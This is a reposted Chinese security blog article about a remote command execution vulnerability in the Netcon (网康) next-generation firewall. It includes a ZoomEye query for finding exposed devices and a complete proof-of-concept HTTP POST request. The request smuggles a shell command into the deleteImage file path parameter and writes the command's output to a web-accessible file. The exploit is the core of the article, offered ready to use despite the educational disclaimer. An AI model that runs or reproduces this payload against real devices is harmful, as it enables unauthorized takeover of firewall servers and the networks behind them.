当前位置:   article > 正文

网康科技-下一代防火墙存在任意命令执行漏洞【附POC】

网康科技-下一代防火墙存在任意命令执行漏洞【附POC】

关注本公众号,长期推送技术文章

知攻善防实验室

红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。

73篇原创内容

公众号

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

漏洞简介
奇安信网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙,存在远程命令执行,通过漏洞攻击者可以获取服务器权限。

资产

ZoomEye语法:app:"网康下一代防火墙"

图片

漏洞复现

使用Yakit或Burp,传入POC

POST /directdata/direct/router HTTP/1.1Host: Connection: closeContent-Length: 160Upgrade-Insecure-Requests: 1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

图片

然后访问https://xxxx.xxx/test.txt

发现,命令已经成功执行

图片

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/150807
推荐阅读
相关标签
  

闽ICP备14008679号